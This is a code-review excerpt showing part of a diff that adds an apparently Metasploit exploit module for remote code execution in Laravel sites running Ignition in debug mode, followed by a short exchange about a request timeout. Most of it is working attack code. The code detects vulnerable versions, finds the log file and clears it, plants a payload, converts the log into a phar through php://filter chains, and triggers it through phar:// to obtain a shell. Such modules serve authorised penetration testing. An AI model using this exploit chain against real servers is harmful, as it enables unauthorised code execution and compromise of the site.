modules/exploits/multi/php/ignition_laravel_debug_rce.rb

```diff
@@ -0,0 +1,222 @@
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path.to_s),
+      'method' => 'PUT'
+    }, 1)
+    # Check whether it is using facade/ignition
+    # If is using it should respond method not allowed
+    # checking if debug mode is enable
+    if res && res.code == 405 && res.body.match(/label:"(Debug)"/)
+      vprint_status 'Debug mode is enabled.'
+      # check version
+      versions = JSON.parse(
+        res.body.match(%r{ .+"report":(\{.*),"exception_class}).captures.first.gsub(/$/, '}')
+      )
+      version = Rex::Version.new(versions['framework_version'])
+      vprint_status "Found PHP #{versions['language_version']} running Laravel #{version}"
+      return Exploit::CheckCode::Vulnerable if version <= Rex::Version.new('8.26.1')
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    @logfile = datastore['LOGPATH'] || find_log_path
+    fail_with(Failure::BadConfig, 'Unable to find log path. Set it up manually') unless @logfile
+
+    clear_log
+    put_payload
+    convert_to_phar
+    run_phar
+
+    handler
+
+    clear_log
+  end
+
+  def find_log_path
+    res = post Rex::Text.rand_text_alpha_upper(12)
+    if res.code == 500 && res.body.match(%r{"file":"(\\/[^"]+?)/vendor\\/[^"]+?})
+      logfile = Regexp.last_match(1).gsub(/\\/, '')
+      logfile += '/storage/logs/laravel.log'
+      res = post logfile
+      if res.code == 200
+        vprint_status "Found log file #{logfile}"
+        return logfile
+      end
+    else
+      vprint_error 'Unable to find full path'
+      return
+    end
+    vprint_error "Log file does not exist #{logfile}"
+    return
+  end
+
+  def clear_log
+    post "php://filter/read=consumed/resource=#{@logfile}"
+  end
+
+  def put_payload
+    post format_payload
+    post Rex::Text.rand_text_alpha_upper(2)
+  end
+
+  def convert_to_phar
+    filters = %w[
+      convert.quoted-printable-decode
+      convert.iconv.utf-16le.utf-8
+      convert.base64-decode
+    ].join('|')
+
+    post "php://filter/write=#{filters}/resource=#{@logfile}"
+  end
+
+  def run_phar
+    post "phar://#{@logfile}/#{Rex::Text.rand_text_alpha_lower(4..6)}.txt"
+    # resp.body.match(%r{^(.*)\n<!doctype html>})
+    # $1 ? print_good($1) : nil
+  end
+
+  def body_template(data)
+    {
+      solution: 'Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution',
+      parameters: {
+        viewFile: data,
+        variableName: Rex::Text.rand_text_alpha_lower(4..12)
+      }
+    }.to_json
+  end
+
+  def post(data)
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path.to_s),
+      'method' => 'POST',
+      'data' => body_template(data),
+      'ctype' => 'application/json',
+      'headers' => {
+        'Accept' => '*/*',
+        'Accept-Encoding' => 'gzip, deflate'
+      }
+    }, 1)
```

Comment:
Is there a reason for the non-default timeout of 1?

Reply:
I had some delayed responses during my test, but the exploit seems to works fine with the default timeout.